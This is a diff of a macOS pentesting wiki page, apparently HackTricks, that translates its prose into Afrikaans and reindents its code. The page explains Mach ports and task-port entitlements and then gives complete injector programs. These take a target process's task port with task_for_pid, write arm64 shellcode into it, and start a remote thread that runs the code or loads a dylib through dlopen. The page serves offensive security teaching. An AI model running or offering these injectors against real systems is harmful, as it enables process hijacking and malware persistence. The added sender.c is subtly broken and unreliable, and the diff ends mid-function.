+kr = bootstrap_register(bootstrap_port, "org.darlinghq.example", port); +if (kr != KERN_SUCCESS) { +printf("bootstrap_register() failed with code 0x%x\n", kr); +return 1; +} +printf("bootstrap_register()'ed our port\n"); - // Wait for a message. - struct { - mach_msg_header_t header; - char some_text[10]; - int some_number; - mach_msg_trailer_t trailer; - } message; +// Wait for a message. +struct { +mach_msg_header_t header; +char some_text[10]; +int some_number; +mach_msg_trailer_t trailer; +} message; - kr = mach_msg( - &message.header, // Same as (mach_msg_header_t *) &message. - MACH_RCV_MSG, // Options. We're receiving a message. - 0, // Size of the message being sent, if sending. - sizeof(message), // Size of the buffer for receiving. - port, // The port to receive a message on. - MACH_MSG_TIMEOUT_NONE, - MACH_PORT_NULL // Port for the kernel to send notifications about this message to. - ); - if (kr != KERN_SUCCESS) { - printf("mach_msg() failed with code 0x%x\n", kr); - return 1; - } - printf("Got a message\n"); +kr = mach_msg( +&message.header, // Same as (mach_msg_header_t *) &message. +MACH_RCV_MSG, // Options. We're receiving a message. +0, // Size of the message being sent, if sending. +sizeof(message), // Size of the buffer for receiving. +port, // The port to receive a message on. +MACH_MSG_TIMEOUT_NONE, +MACH_PORT_NULL // Port for the kernel to send notifications about this message to. 
+); +if (kr != KERN_SUCCESS) { +printf("mach_msg() failed with code 0x%x\n", kr); +return 1; +} +printf("Got a message\n"); - message.some_text[9] = 0; - printf("Text: %s, number: %d\n", message.some_text, message.some_number); +message.some_text[9] = 0; +printf("Text: %s, number: %d\n", message.some_text, message.some_number); } ``` +{% tab title="sender.c" %} + +```c +#include +#include +#include +#include +#include +#include + +int main(int argc, char *argv[]) { + mach_port_t server_port; + kern_return_t kr; + char message[256]; + + if (argc != 2) { + printf("Usage: %s \n", argv[0]); + return 1; + } + + // Connect to the server port + kr = task_get_special_port(mach_task_self(), TASK_AUDIT_PORT, &server_port); + if (kr != KERN_SUCCESS) { + printf("Failed to get server port: %s\n", mach_error_string(kr)); + return 1; + } + + // Copy the message to the server + strncpy(message, argv[1], sizeof(message)); + + // Send the message to the server + kr = mach_msg((mach_msg_header_t *)&message, MACH_SEND_MSG, sizeof(message), 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL); + if (kr != KERN_SUCCESS) { + printf("Failed to send message: %s\n", mach_error_string(kr)); + return 1; + } + + printf("Message sent successfully\n"); + + return 0; +} +``` + {% endtab %} -{% tab title="sender.c" %} +{% tab title="receiver.c" %} ```c // Code from https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html // gcc sender.c -o sender 
@@ -195,66 +234,66 @@ int main() { int main() { - // Lookup the receiver port using the bootstrap server. - mach_port_t port; - kern_return_t kr = bootstrap_look_up(bootstrap_port, "org.darlinghq.example", &port); - if (kr != KERN_SUCCESS) { - printf("bootstrap_look_up() failed with code 0x%x\n", kr); - return 1; - } - printf("bootstrap_look_up() returned port right name %d\n", port); +// Lookup the receiver port using the bootstrap server. +mach_port_t port; +kern_return_t kr = bootstrap_look_up(bootstrap_port, "org.darlinghq.example", &port); +if (kr != KERN_SUCCESS) { +printf("bootstrap_look_up() failed with code 0x%x\n", kr); +return 1; +} +printf("bootstrap_look_up() returned port right name %d\n", port); - // Construct our message. - struct { - mach_msg_header_t header; - char some_text[10]; - int some_number; - } message; +// Construct our message. +struct { +mach_msg_header_t header; +char some_text[10]; +int some_number; +} message; - message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); - message.header.msgh_remote_port = port; - message.header.msgh_local_port = MACH_PORT_NULL; +message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); +message.header.msgh_remote_port = port; +message.header.msgh_local_port = MACH_PORT_NULL; - strncpy(message.some_text, "Hello", sizeof(message.some_text)); - message.some_number = 35; +strncpy(message.some_text, "Hello", sizeof(message.some_text)); +message.some_number = 35; - // Send the message. - kr = mach_msg( - &message.header, // Same as (mach_msg_header_t *) &message. - MACH_SEND_MSG, // Options. We're sending a message. - sizeof(message), // Size of the message being sent. - 0, // Size of the buffer for receiving. - MACH_PORT_NULL, // A port to receive a message on, if receiving. - MACH_MSG_TIMEOUT_NONE, - MACH_PORT_NULL // Port for the kernel to send notifications about this message to. 
- ); - if (kr != KERN_SUCCESS) { - printf("mach_msg() failed with code 0x%x\n", kr); - return 1; - } - printf("Sent a message\n"); +// Send the message. +kr = mach_msg( +&message.header, // Same as (mach_msg_header_t *) &message. +MACH_SEND_MSG, // Options. We're sending a message. +sizeof(message), // Size of the message being sent. +0, // Size of the buffer for receiving. +MACH_PORT_NULL, // A port to receive a message on, if receiving. +MACH_MSG_TIMEOUT_NONE, +MACH_PORT_NULL // Port for the kernel to send notifications about this message to. +); +if (kr != KERN_SUCCESS) { +printf("mach_msg() failed with code 0x%x\n", kr); +return 1; +} +printf("Sent a message\n"); } ``` {% endtab %} {% endtabs %} -### Privileged Ports +### Bevoorregte poorte -* **Host port**: If a process has **Send** privilege over this port he can get **information** about the **system** (e.g. `host_processor_info`). -* **Host priv port**: A process with **Send** right over this port can perform **privileged actions** like loading a kernel extension. The **process need to be root** to get this permission. - * Moreover, in order to call **`kext_request`** API it's needed to have other entitlements **`com.apple.private.kext*`** which are only given to Apple binaries. -* **Task name port:** An unprivileged version of the _task port_. It references the task, but does not allow controlling it. The only thing that seems to be available through it is `task_info()`. -* **Task port** (aka kernel port)**:** With Send permission over this port it's possible to control the task (read/write memory, create threads...). - * Call `mach_task_self()` to **get the name** for this port for the caller task. This port is only **inherited** across **`exec()`**; a new task created with `fork()` gets a new task port (as a special case, a task also gets a new task port after `exec()`in a suid binary). 
The only way to spawn a task and get its port is to perform the ["port swap dance"](https://robert.sesek.com/2014/1/changes\_to\_xnu\_mach\_ipc.html) while doing a `fork()`. - * These are the restrictions to access the port (from `macos_task_policy` from the binary `AppleMobileFileIntegrity`): - * If the app has **`com.apple.security.get-task-allow` entitlement** processes from the **same user can access the task port** (commonly added by Xcode for debugging). The **notarization** process won't allow it to production releases. - * Apps with the **`com.apple.system-task-ports`** entitlement can get the **task port for any** process, except the kernel. In older versions it was called **`task_for_pid-allow`**. This is only granted to Apple applications. - * **Root can access task ports** of applications **not** compiled with a **hardened** runtime (and not from Apple). +* **Gasheerpoort**: As 'n proses **Send**-bevoegdheid oor hierdie poort het, kan hy **inligting** oor die **sisteem** kry (bv. `host_processor_info`). +* **Gasheerprivaatpoort**: 'n Proses met **Send**-reg oor hierdie poort kan **bevoorregte aksies** uitvoer, soos die laai van 'n kernuitbreiding. Die **proses moet root wees** om hierdie toestemming te kry. +* Verder, om die **`kext_request`** API te roep, is dit nodig om ander toekennings **`com.apple.private.kext*`** te hê wat slegs aan Apple-binêre gegee word. +* **Taaknaampoort**: 'n Onbevoorregte weergawe van die _taakpoort_. Dit verwys na die taak, maar laat nie beheer daaroor toe nie. Die enigste ding wat beskikbaar lyk deur dit is `task_info()`. +* **Taakpoort** (ook bekend as kernpoort)**:** Met Send-toestemming oor hierdie poort is dit moontlik om die taak te beheer (lees/skryf geheue, skep drade...). +* Roep `mach_task_self()` om die naam vir hierdie poort vir die aanroeperstaak te **kry**. 
Hierdie poort word slegs **oorgeërf** met **`exec()`**; 'n nuwe taak wat met `fork()` geskep is, kry 'n nuwe taakpoort (as 'n spesiale geval kry 'n taak ook 'n nuwe taakpoort na `exec()` in 'n suid-binêre). Die enigste manier om 'n taak te skep en sy poort te kry, is om die ["poortruil-dans"](https://robert.sesek.com/2014/1/changes\_to\_xnu\_mach\_ipc.html) uit te voer terwyl 'n `fork()` gedoen word. +* Hier is die beperkings om toegang tot die poort te verkry (vanaf `macos_task_policy` van die binêre `AppleMobileFileIntegrity`): +* As die toepassing die **`com.apple.security.get-task-allow` toekenning** het, kan prosesse van dieselfde gebruiker toegang tot die taakpoort verkry (gewoonlik deur Xcode by te voeg vir foutopsporing). Die **notarisering**-proses sal dit nie toelaat vir produksievrystellings nie. +* Toepassings met die **`com.apple.system-task-ports`** toekenning kan die **taakpoort vir enige** proses kry, behalwe die kernel. In ouer weergawes is dit genoem **`task_for_pid-allow`**. Dit word slegs aan Apple-toepassings toegeken. +* **Root kan taakpoorte** van toepassings **wat nie** met 'n **verhard**-uitvoertyd gekompileer is nie (en nie van Apple af nie) toegang verkry. -### Shellcode Injection in thread via Task port +### Shellcode-inspuiting in draad via Taakpoort -You can grab a shellcode from: +Jy kan 'n shellcode kry vanaf: {% content-ref url="../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %} [arm64-basic-assembly.md](../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md) 
@@ -269,49 +308,46 @@ You can grab a shellcode from: #import double performMathOperations() { - double result = 0; - for (int i = 0; i < 10000; i++) { - result += sqrt(i) * tan(i) - cos(i); - } - return result; +double result = 0; +for (int i = 0; i < 10000; i++) { +result += sqrt(i) * tan(i) - cos(i); +} +return result; } int main(int argc, const char * argv[]) { - @autoreleasepool { - NSLog(@"Process ID: %d", [[NSProcessInfo processInfo] +@autoreleasepool { +NSLog(@"Process ID: %d", [[NSProcessInfo processInfo] processIdentifier]); - while (true) { - [NSThread sleepForTimeInterval:5]; +while (true) { +[NSThread sleepForTimeInterval:5]; - performMathOperations(); // Silent action +performMathOperations(); // Silent action - [NSThread sleepForTimeInterval:5]; - } - } - return 0; +[NSThread sleepForTimeInterval:5]; +} +} +return 0; } ``` -{% endtab %} - {% tab title="entitlements.plist" %} ```xml - com.apple.security.get-task-allow - +com.apple.security.get-task-allow + ``` {% endtab %} {% endtabs %} -**Compile** the previous program and add the **entitlements** to be able to inject code with the same user (if not you will need to use **sudo**). +**Kompileer** die vorige program en voeg die **toekennings** by om in staat te wees om kode in te spuit met dieselfde gebruiker (as jy nie dit doen nie, sal jy **sudo** moet gebruik).
sc_injector.m - ```objectivec // gcc -framework Foundation -framework Appkit sc_injector.m -o sc_injector @@ -325,18 +361,18 @@ processIdentifier]); kern_return_t mach_vm_allocate ( - vm_map_t target, - mach_vm_address_t *address, - mach_vm_size_t size, - int flags +vm_map_t target, +mach_vm_address_t *address, +mach_vm_size_t size, +int flags ); kern_return_t mach_vm_write ( - vm_map_t target_task, - mach_vm_address_t address, - vm_offset_t data, - mach_msg_type_number_t dataCnt +vm_map_t target_task, +mach_vm_address_t address, +vm_offset_t data, +mach_msg_type_number_t dataCnt ); 
@@ -354,177 +390,174 @@ char injectedCode[] = "\xff\x03\x01\xd1\xe1\x03\x00\x91\x60\x01\x00\x10\x20\x00\ int inject(pid_t pid){ - task_t remoteTask; +task_t remoteTask; - // Get access to the task port of the process we want to inject into - kern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask); - if (kr != KERN_SUCCESS) { - fprintf (stderr, "Unable to call task_for_pid on pid %d: %d. Cannot continue!\n",pid, kr); - return (-1); - } - else{ - printf("Gathered privileges over the task port of process: %d\n", pid); - } +// Get access to the task port of the process we want to inject into +kern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask); +if (kr != KERN_SUCCESS) { +fprintf (stderr, "Unable to call task_for_pid on pid %d: %d. Cannot continue!\n",pid, kr); +return (-1); +} +else{ +printf("Gathered privileges over the task port of process: %d\n", pid); +} - // Allocate memory for the stack - mach_vm_address_t remoteStack64 = (vm_address_t) NULL; - mach_vm_address_t remoteCode64 = (vm_address_t) NULL; - kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE); - - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to allocate memory for remote stack in thread: Error %s\n", mach_error_string(kr)); - return (-2); - } - else - { +// Allocate memory for the stack +mach_vm_address_t remoteStack64 = (vm_address_t) NULL; +mach_vm_address_t remoteCode64 = (vm_address_t) NULL; +kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE); - fprintf (stderr, "Allocated remote stack @0x%llx\n", remoteStack64); - } - - // Allocate memory for the code - remoteCode64 = (vm_address_t) NULL; - kr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE ); +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to allocate memory for remote stack in thread: Error %s\n", mach_error_string(kr)); +return (-2); +} +else +{ - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to allocate memory for 
remote code in thread: Error %s\n", mach_error_string(kr)); - return (-2); - } - +fprintf (stderr, "Allocated remote stack @0x%llx\n", remoteStack64); +} - // Write the shellcode to the allocated memory - kr = mach_vm_write(remoteTask, // Task port - remoteCode64, // Virtual Address (Destination) - (vm_address_t) injectedCode, // Source - 0xa9); // Length of the source +// Allocate memory for the code +remoteCode64 = (vm_address_t) NULL; +kr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE ); + +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to allocate memory for remote code in thread: Error %s\n", mach_error_string(kr)); +return (-2); +} - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to write remote thread memory: Error %s\n", mach_error_string(kr)); - return (-3); - } +// Write the shellcode to the allocated memory +kr = mach_vm_write(remoteTask, // Task port +remoteCode64, // Virtual Address (Destination) +(vm_address_t) injectedCode, // Source +0xa9); // Length of the source - // Set the permissions on the allocated code memory - kr = vm_protect(remoteTask, remoteCode64, 0x70, FALSE, VM_PROT_READ | VM_PROT_EXECUTE); +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to write remote thread memory: Error %s\n", mach_error_string(kr)); +return (-3); +} - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to set memory permissions for remote thread's code: Error %s\n", mach_error_string(kr)); - return (-4); - } - // Set the permissions on the allocated stack memory - kr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE); - - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to set memory permissions for remote thread's stack: Error %s\n", mach_error_string(kr)); - return (-4); - } +// Set the permissions on the allocated code memory +kr = vm_protect(remoteTask, remoteCode64, 0x70, FALSE, VM_PROT_READ | VM_PROT_EXECUTE); - // Create thread to run shellcode - struct 
arm_unified_thread_state remoteThreadState64; - thread_act_t remoteThread; +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to set memory permissions for remote thread's code: Error %s\n", mach_error_string(kr)); +return (-4); +} - memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) ); +// Set the permissions on the allocated stack memory +kr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE); - remoteStack64 += (STACK_SIZE / 2); // this is the real stack - //remoteStack64 -= 8; // need alignment of 16 +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to set memory permissions for remote thread's stack: Error %s\n", mach_error_string(kr)); +return (-4); +} - const char* p = (const char*) remoteCode64; +// Create thread to run shellcode +struct arm_unified_thread_state remoteThreadState64; +thread_act_t remoteThread; - remoteThreadState64.ash.flavor = ARM_THREAD_STATE64; - remoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT; - remoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64; - remoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64; +memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) ); - printf ("Remote Stack 64 0x%llx, Remote code is %p\n", remoteStack64, p ); +remoteStack64 += (STACK_SIZE / 2); // this is the real stack +//remoteStack64 -= 8; // need alignment of 16 - kr = thread_create_running(remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64, - (thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread ); +const char* p = (const char*) remoteCode64; - if (kr != KERN_SUCCESS) { - fprintf(stderr,"Unable to create remote thread: error %s", mach_error_string (kr)); - return (-3); - } +remoteThreadState64.ash.flavor = ARM_THREAD_STATE64; +remoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT; +remoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64; +remoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64; - return (0); +printf ("Remote Stack 64 
0x%llx, Remote code is %p\n", remoteStack64, p ); + +kr = thread_create_running(remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64, +(thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread ); + +if (kr != KERN_SUCCESS) { +fprintf(stderr,"Unable to create remote thread: error %s", mach_error_string (kr)); +return (-3); +} + +return (0); } pid_t pidForProcessName(NSString *processName) { - NSArray *arguments = @[@"pgrep", processName]; - NSTask *task = [[NSTask alloc] init]; - [task setLaunchPath:@"/usr/bin/env"]; - [task setArguments:arguments]; +NSArray *arguments = @[@"pgrep", processName]; +NSTask *task = [[NSTask alloc] init]; +[task setLaunchPath:@"/usr/bin/env"]; +[task setArguments:arguments]; - NSPipe *pipe = [NSPipe pipe]; - [task setStandardOutput:pipe]; +NSPipe *pipe = [NSPipe pipe]; +[task setStandardOutput:pipe]; - NSFileHandle *file = [pipe fileHandleForReading]; +NSFileHandle *file = [pipe fileHandleForReading]; - [task launch]; +[task launch]; - NSData *data = [file readDataToEndOfFile]; - NSString *string = [[NSString alloc] initWithData:data encoding:NSUTF8StringEncoding]; +NSData *data = [file readDataToEndOfFile]; +NSString *string = [[NSString alloc] initWithData:data encoding:NSUTF8StringEncoding]; - return (pid_t)[string integerValue]; +return (pid_t)[string integerValue]; } BOOL isStringNumeric(NSString *str) { - NSCharacterSet* nonNumbers = [[NSCharacterSet decimalDigitCharacterSet] invertedSet]; - NSRange r = [str rangeOfCharacterFromSet: nonNumbers]; - return r.location == NSNotFound; +NSCharacterSet* nonNumbers = [[NSCharacterSet decimalDigitCharacterSet] invertedSet]; +NSRange r = [str rangeOfCharacterFromSet: nonNumbers]; +return r.location == NSNotFound; } int main(int argc, const char * argv[]) { - @autoreleasepool { - if (argc < 2) { - NSLog(@"Usage: %s ", argv[0]); - return 1; - } +@autoreleasepool { +if (argc < 2) { +NSLog(@"Usage: %s ", argv[0]); +return 1; +} - NSString *arg = [NSString 
stringWithUTF8String:argv[1]]; - pid_t pid; +NSString *arg = [NSString stringWithUTF8String:argv[1]]; +pid_t pid; - if (isStringNumeric(arg)) { - pid = [arg intValue]; - } else { - pid = pidForProcessName(arg); - if (pid == 0) { - NSLog(@"Error: Process named '%@' not found.", arg); - return 1; - } - else{ - printf("Found PID of process '%s': %d\n", [arg UTF8String], pid); - } - } +if (isStringNumeric(arg)) { +pid = [arg intValue]; +} else { +pid = pidForProcessName(arg); +if (pid == 0) { +NSLog(@"Error: Process named '%@' not found.", arg); +return 1; +} +else{ +printf("Found PID of process '%s': %d\n", [arg UTF8String], pid); +} +} - inject(pid); - } +inject(pid); +} - return 0; +return 0; } ``` -
- ```bash gcc -framework Foundation -framework Appkit sc_inject.m -o sc_inject ./inject ``` +### Dylib Injeksie in draad via Taakpoort -### Dylib Injection in thread via Task port +In macOS kan **drade** gemanipuleer word deur **Mach** of deur die gebruik van die **posix `pthread` api**. Die draad wat ons in die vorige injeksie gegenereer het, is gegenereer met behulp van die Mach api, so dit is **nie posix voldoenend nie**. -In macOS **threads** might be manipulated via **Mach** or using **posix `pthread` api**. The thread we generated in the previos injection, was generated using Mach api, so **it's not posix compliant**. +Dit was moontlik om 'n eenvoudige shellcode in te spuit om 'n bevel uit te voer omdat dit nie met posix voldoenende api's hoef te werk nie, slegs met Mach. **Meer komplekse injeksies** sal egter vereis dat die draad ook **posix voldoenend** is. -It was possible to **inject a simple shellcode** to execute a command because it **didn't need to work with posix** compliant apis, only with Mach. **More complex injections** would need the **thread** to be also **posix compliant**. +Om die draad te **verbeter**, moet dit die **`pthread_create_from_mach_thread`** roep wat 'n geldige pthread sal skep. Hierdie nuwe pthread kan dan **dlopen** oproep om 'n dylib van die stelsel te laai, sodat dit moontlik is om aangepaste biblioteke te laai in plaas daarvan om nuwe shellcode te skryf om verskillende aksies uit te voer. -Therefore, to **improve the thread** it should call **`pthread_create_from_mach_thread`** which will **create a valid pthread**. Then, this new pthread could **call dlopen** to **load a dylib** from the system, so instead of writing new shellcode to perform different actions it's possible to load custom libraries. 
- -You can find **example dylibs** in (for example the one that generates a log and then you can listen to it): +Jy kan **voorbeeld dylibs** vind in (byvoorbeeld die een wat 'n log genereer en dan kan jy daarna luister): {% content-ref url="../../macos-dyld-hijacking-and-dyld_insert_libraries.md" %} [macos-dyld-hijacking-and-dyld\_insert\_libraries.md](../../macos-dyld-hijacking-and-dyld\_insert\_libraries.md) @@ -533,7 +566,6 @@ You can find **example dylibs** in (for example the one that generates a log and
dylib_injector.m - ```objectivec // gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector // Based on http://newosxbook.com/src.jl?tree=listings&file=inject.c @@ -559,18 +591,18 @@ You can find **example dylibs** in (for example the one that generates a log and // And I say, bullshit. kern_return_t mach_vm_allocate ( - vm_map_t target, - mach_vm_address_t *address, - mach_vm_size_t size, - int flags +vm_map_t target, +mach_vm_address_t *address, +mach_vm_size_t size, +int flags ); kern_return_t mach_vm_write ( - vm_map_t target_task, - mach_vm_address_t address, - vm_offset_t data, - mach_msg_type_number_t dataCnt +vm_map_t target_task, +mach_vm_address_t address, +vm_offset_t data, +mach_msg_type_number_t dataCnt ); 
@@ -585,266 +617,262 @@ kern_return_t mach_vm_write char injectedCode[] = - // "\x00\x00\x20\xd4" // BRK X0 ; // useful if you need a break :) +// "\x00\x00\x20\xd4" // BRK X0 ; // useful if you need a break :) - // Call pthread_set_self +// Call pthread_set_self - "\xff\x83\x00\xd1" // SUB SP, SP, #0x20 ; Allocate 32 bytes of space on the stack for local variables - "\xFD\x7B\x01\xA9" // STP X29, X30, [SP, #0x10] ; Save frame pointer and link register on the stack - "\xFD\x43\x00\x91" // ADD X29, SP, #0x10 ; Set frame pointer to current stack pointer - "\xff\x43\x00\xd1" // SUB SP, SP, #0x10 ; Space for the - "\xE0\x03\x00\x91" // MOV X0, SP ; (arg0)Store in the stack the thread struct - "\x01\x00\x80\xd2" // MOVZ X1, 0 ; X1 (arg1) = 0; - "\xA2\x00\x00\x10" // ADR X2, 0x14 ; (arg2)12bytes from here, Address where the new thread should start - "\x03\x00\x80\xd2" // MOVZ X3, 0 ; X3 (arg3) = 0; - "\x68\x01\x00\x58" // LDR X8, #44 ; load address of PTHRDCRT (pthread_create_from_mach_thread) - "\x00\x01\x3f\xd6" // BLR X8 ; call pthread_create_from_mach_thread - "\x00\x00\x00\x14" // loop: b loop ; loop forever +"\xff\x83\x00\xd1" // SUB SP, SP, #0x20 ; Allocate 32 bytes of space on the stack for local variables +"\xFD\x7B\x01\xA9" // STP X29, X30, [SP, #0x10] ; Save frame pointer and link register on the stack +"\xFD\x43\x00\x91" // ADD X29, SP, #0x10 ; Set frame pointer to current stack pointer +"\xff\x43\x00\xd1" // SUB SP, SP, #0x10 ; Space for the +"\xE0\x03\x00\x91" // MOV X0, SP ; (arg0)Store in the stack the thread struct +"\x01\x00\x80\xd2" // MOVZ X1, 0 ; X1 (arg1) = 0; +"\xA2\x00\x00\x10" // ADR X2, 0x14 ; (arg2)12bytes from here, Address where the new thread should start +"\x03\x00\x80\xd2" // MOVZ X3, 0 ; X3 (arg3) = 0; +"\x68\x01\x00\x58" // LDR X8, #44 ; load address of PTHRDCRT (pthread_create_from_mach_thread) +"\x00\x01\x3f\xd6" // BLR X8 ; call pthread_create_from_mach_thread +"\x00\x00\x00\x14" // loop: b loop ; loop forever - // Call dlopen with 
the path to the library - "\xC0\x01\x00\x10" // ADR X0, #56 ; X0 => "LIBLIBLIB..."; - "\x68\x01\x00\x58" // LDR X8, #44 ; load DLOPEN - "\x01\x00\x80\xd2" // MOVZ X1, 0 ; X1 = 0; - "\x29\x01\x00\x91" // ADD x9, x9, 0 - I left this as a nop - "\x00\x01\x3f\xd6" // BLR X8 ; do dlopen() - - // Call pthread_exit - "\xA8\x00\x00\x58" // LDR X8, #20 ; load PTHREADEXT - "\x00\x00\x80\xd2" // MOVZ X0, 0 ; X1 = 0; - "\x00\x01\x3f\xd6" // BLR X8 ; do pthread_exit - - "PTHRDCRT" // <- - "PTHRDEXT" // <- - "DLOPEN__" // <- - "LIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIB" - "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" - "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" - "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" - "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" - "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" ; +// Call dlopen with the path to the library +"\xC0\x01\x00\x10" // ADR X0, #56 ; X0 => "LIBLIBLIB..."; +"\x68\x01\x00\x58" // LDR X8, #44 ; load DLOPEN +"\x01\x00\x80\xd2" // MOVZ X1, 0 ; X1 = 0; +"\x29\x01\x00\x91" // ADD x9, x9, 0 - I left this as a nop +"\x00\x01\x3f\xd6" // BLR X8 ; do dlopen() + +// Call pthread_exit +"\xA8\x00\x00\x58" // LDR X8, #20 ; load PTHREADEXT +"\x00\x00\x80\xd2" // MOVZ X0, 0 ; X1 = 0; +"\x00\x01\x3f\xd6" // BLR X8 ; do pthread_exit + +"PTHRDCRT" // <- +"PTHRDEXT" // <- +"DLOPEN__" // <- +"LIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIB" +"\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" +"\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" +"\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" +"\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" +"\x00" "\x00" "\x00" "\x00" 
"\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" ; int inject(pid_t pid, const char *lib) { - task_t remoteTask; - struct stat buf; +task_t remoteTask; +struct stat buf; - // Check if the library exists - int rc = stat (lib, &buf); +// Check if the library exists +int rc = stat (lib, &buf); - if (rc != 0) - { - fprintf (stderr, "Unable to open library file %s (%s) - Cannot inject\n", lib,strerror (errno)); - //return (-9); - } +if (rc != 0) +{ +fprintf (stderr, "Unable to open library file %s (%s) - Cannot inject\n", lib,strerror (errno)); +//return (-9); +} - // Get access to the task port of the process we want to inject into - kern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask); - if (kr != KERN_SUCCESS) { - fprintf (stderr, "Unable to call task_for_pid on pid %d: %d. Cannot continue!\n",pid, kr); - return (-1); - } - else{ - printf("Gathered privileges over the task port of process: %d\n", pid); - } +// Get access to the task port of the process we want to inject into +kern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask); +if (kr != KERN_SUCCESS) { +fprintf (stderr, "Unable to call task_for_pid on pid %d: %d. 
Cannot continue!\n",pid, kr); +return (-1); +} +else{ +printf("Gathered privileges over the task port of process: %d\n", pid); +} - // Allocate memory for the stack - mach_vm_address_t remoteStack64 = (vm_address_t) NULL; - mach_vm_address_t remoteCode64 = (vm_address_t) NULL; - kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE); - - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to allocate memory for remote stack in thread: Error %s\n", mach_error_string(kr)); - return (-2); - } - else - { +// Allocate memory for the stack +mach_vm_address_t remoteStack64 = (vm_address_t) NULL; +mach_vm_address_t remoteCode64 = (vm_address_t) NULL; +kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE); - fprintf (stderr, "Allocated remote stack @0x%llx\n", remoteStack64); - } - - // Allocate memory for the code - remoteCode64 = (vm_address_t) NULL; - kr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE ); +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to allocate memory for remote stack in thread: Error %s\n", mach_error_string(kr)); +return (-2); +} +else +{ - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to allocate memory for remote code in thread: Error %s\n", mach_error_string(kr)); - return (-2); - } +fprintf (stderr, "Allocated remote stack @0x%llx\n", remoteStack64); +} - - // Patch shellcode +// Allocate memory for the code +remoteCode64 = (vm_address_t) NULL; +kr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE ); - int i = 0; - char *possiblePatchLocation = (injectedCode ); - for (i = 0 ; i < 0x100; i++) - { - - // Patching is crude, but works. 
